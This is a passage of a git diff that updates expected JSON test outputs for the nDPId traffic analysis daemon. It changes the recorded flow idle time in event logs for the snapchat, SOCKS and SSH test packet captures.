+00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008131,"flow_last_seen":1431418008701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2439,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","packets-captured":56,"packets-processed":56,"total-skipped-flows":0,"total-l4-data-len":7115,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1431418008853} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 56/56 diff --git a/test/results/socks-http-example.pcap.out b/test/results/socks-http-example.pcap.out index c35bc9175..152257516 100644 --- a/test/results/socks-http-example.pcap.out +++ b/test/results/socks-http-example.pcap.out 
@@ -1,23 +1,23 @@ 00469{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"socks-http-example.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1386004309468} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004309468,"flow_last_seen":1386004309468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004309468,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1386004309468,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004309468,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAxApAAEAGJ5MKtJy5CrSc+dEdBDiu6S7xAAAAALAC\/\/9AOQAAAgQFtAEDAwQBAQgKFh7eWwAAAAAEAgAA"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1386004309469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004309469,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R2gPF01ruku8qASOJDLlAAAAgQFtAQCCApiX+0zFh7eWwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1386004309469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004309469,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0BhZAAEAG5ZMKtJy5CrSc+dEdBDiu6S7yoDxdNoAQICsSxgAAAQEIChYe3ltiX+0z"} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004309468,"flow_last_seen":1386004309473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1386004309473,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004312331,"flow_last_seen":1386004312331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004312331,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1386004312331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAPjdAAEAGrWYKtJy5CrSc+dEeBDi5gOhGAAAAALAC\/\/9xLQAAAgQFtAEDAwQBAQgKFh7peQAAAAAEAgAA"} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1386004312331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004312331,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R7KitgsuYDoR6ASOJBMFQAAAgQFtAQCCApiX\/hhFh7peQEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1386004312331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0IDxAAEAGy20KtJy5CrSc+dEeBDi5gOhHyorYLYAQICuTRgAAAQEIChYe6XliX\/hh"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004312331,"flow_last_seen":1386004312379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1386004312379,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004317979,"flow_last_seen":1386004317979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004317979,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1386004317979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004317979,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAZFdAAEAGh0YKtJy5CrSc+dEfBDg7J\/Q2AAAAALAC\/\/\/NpwAAAgQFtAEDAwQBAQgKFh7\/ZwAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1386004317980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004317980,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R8tB48eOyf0N6ASOJB5EQAAAgQFtAQCCApiYA5xFh7\/ZwEDAwc="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1386004317980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004317980,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0jiVAAEAGXYQKtJy5CrSc+dEfBDg7J\/Q3LQePH4AQICvAQgAAAQEIChYe\/2diYA5x"} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1386004309468,"flow_last_seen":1386004309478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1754,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1386004312331,"flow_last_seen":1386004312384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1770,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004309468,"flow_last_seen":1386004309468,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004309468,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1386004309468,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004309468,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAxApAAEAGJ5MKtJy5CrSc+dEdBDiu6S7xAAAAALAC\/\/9AOQAAAgQFtAEDAwQBAQgKFh7eWwAAAAAEAgAA"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1386004309469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004309469,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R2gPF01ruku8qASOJDLlAAAAgQFtAQCCApiX+0zFh7eWwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1386004309469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004309469,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0BhZAAEAG5ZMKtJy5CrSc+dEdBDiu6S7yoDxdNoAQICsSxgAAAQEIChYe3ltiX+0z"} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004309468,"flow_last_seen":1386004309473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1386004309473,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004312331,"flow_last_seen":1386004312331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004312331,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1386004312331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAPjdAAEAGrWYKtJy5CrSc+dEeBDi5gOhGAAAAALAC\/\/9xLQAAAgQFtAEDAwQBAQgKFh7peQAAAAAEAgAA"} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1386004312331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004312331,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R7KitgsuYDoR6ASOJBMFQAAAgQFtAQCCApiX\/hhFh7peQEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1386004312331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0IDxAAEAGy20KtJy5CrSc+dEeBDi5gOhHyorYLYAQICuTRgAAAQEIChYe6XliX\/hh"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004312331,"flow_last_seen":1386004312379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1386004312379,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 
+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004317979,"flow_last_seen":1386004317979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004317979,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1386004317979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004317979,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAZFdAAEAGh0YKtJy5CrSc+dEfBDg7J\/Q2AAAAALAC\/\/\/NpwAAAgQFtAEDAwQBAQgKFh7\/ZwAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1386004317980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004317980,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R8tB48eOyf0N6ASOJB5EQAAAgQFtAQCCApiYA5xFh7\/ZwEDAwc="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1386004317980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004317980,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0jiVAAEAGXYQKtJy5CrSc+dEfBDg7J\/Q3LQePH4AQICvAQgAAAQEIChYe\/2diYA5x"} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1386004309468,"flow_last_seen":1386004309478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1754,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1386004312331,"flow_last_seen":1386004312384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1770,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 
+00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1386004317979,"flow_last_seen":1386004317989,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1763,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1386004317989,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"socks-http-example.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":46,"total-skipped-flows":0,"total-l4-data-len":5287,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1386004317989} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 46/46 
diff --git a/test/results/ssh.pcap.out b/test/results/ssh.pcap.out index 376a6e63e..1fded3fa3 100644 --- a/test/results/ssh.pcap.out +++ b/test/results/ssh.pcap.out 
@@ -1,15 +1,15 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ssh.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1320435464760} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1320435464760,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1320435464760,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAABAek9AAEAGi52sEO4BrBDuqOQbABY3Xn+qAAAAALAC\/\/+abgAAAgQFtAEDAwMBAQgKHJWv9QAAAAAEAgAA"} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1320435464760,"pkt":"AFBWwAAIAAwppUXgCABFAAA8AABAAEAGBfGsEO6orBDuAQAW5BtConY2N15\/q6ASFqC42wAAAgQFtAQCCAoAEyL4HJWv9QEDAwY="} 